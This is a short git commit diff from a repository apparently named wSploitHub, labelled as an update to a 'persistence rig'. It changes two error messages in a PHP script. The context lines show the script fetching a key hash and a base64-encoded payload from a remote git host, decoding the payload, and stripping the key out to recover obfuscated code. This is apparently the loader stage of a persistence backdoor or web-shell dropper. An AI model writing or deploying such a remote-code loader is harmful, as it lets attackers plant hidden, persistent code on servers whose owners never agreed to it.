ternak: update presisten rig
This commit is contained in:
parent
5b1d5c97a0
commit
caf0d30443
@ -14,11 +14,11 @@ $hashUrl = 'https://git.warceuproject.org/syn/wSploitHub/raw/branch/main/api/v2/
|
|||||||
$codeUrl = 'https://git.warceuproject.org/syn/wSploitHub/raw/branch/main/raw/php/prisisten';
|
$codeUrl = 'https://git.warceuproject.org/syn/wSploitHub/raw/branch/main/raw/php/prisisten';
|
||||||
$keyHash = trim(get_contents($hashUrl));
|
$keyHash = trim(get_contents($hashUrl));
|
||||||
if (empty($keyHash)) {
|
if (empty($keyHash)) {
|
||||||
die("Gagal mengambil hash key dari URL.\n");
|
die("Die! Hash URL.\n");
|
||||||
}
|
}
|
||||||
$encoded_code = get_contents($codeUrl);
|
$encoded_code = get_contents($codeUrl);
|
||||||
if (empty($encoded_code)) {
|
if (empty($encoded_code)) {
|
||||||
die("Gagal mengambil kode terenkripsi dari URL.\n");
|
die("Die! Code URL.\n");
|
||||||
}
|
}
|
||||||
$decoded_code = base64_decode($encoded_code);
|
$decoded_code = base64_decode($encoded_code);
|
||||||
$clean_code = str_replace($keyHash, '', $decoded_code);
|
$clean_code = str_replace($keyHash, '', $decoded_code);
|
||||||
|
Loading…
Reference in New Issue
Block a user